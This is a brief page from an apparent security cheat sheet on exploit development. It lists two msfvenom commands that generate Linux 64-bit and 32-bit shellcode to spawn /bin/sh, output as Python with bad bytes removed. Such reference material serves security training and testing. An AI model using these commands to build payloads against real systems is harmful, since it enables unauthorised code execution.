> For the complete documentation index, see [llms.txt](https://cheats.philkeeble.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cheats.philkeeble.com/exploit-dev/shellcode.md).

# Shellcode

## MSFVenom

### Linux /bin/sh

```
# 64bit shellcode
msfvenom -p linux/x64/exec cmd=/bin/sh -f python -b "\x00\x0a"

# 32bit shellcode
msfvenom -p linux/x86/exec cmd=/bin/sh -f python -b "\x00\x0a"
```
